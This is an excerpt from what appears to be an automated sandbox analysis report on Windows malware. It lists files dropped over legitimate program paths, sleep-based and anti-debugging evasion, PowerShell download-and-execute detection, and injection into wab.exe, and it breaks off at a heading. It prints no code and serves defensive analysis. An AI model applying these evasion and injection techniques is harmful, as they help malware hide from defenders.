Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Windows\svchost.com Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\chrome.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Uninstall.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7772 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7892 Thread sleep count: 5858 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7896 Thread sleep count: 3995 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7924 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: wab.exe, 00000008.00000002.2375969322.0000000006288000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW t.
Source: wab.exe, 00000008.00000002.2375969322.00000000062E2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wab.exe, 00000008.00000002.2375969322.00000000062E2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000002.00000002.2188971993.000001E2CCF37000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQ )
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread information set: HideFromDebugger Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07B449B0 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk, 5_2_07B449B0
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: amsi64_7596.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7596, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7844, type: MEMORYSTR
Drops or copies MsMpEng.exe (Windows Defender, likely to bypass HIPS)
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe Jump to dropped file
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3F20000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2C9FA4C Jump to behavior
Creates a process in suspended mode (likely to inject code)
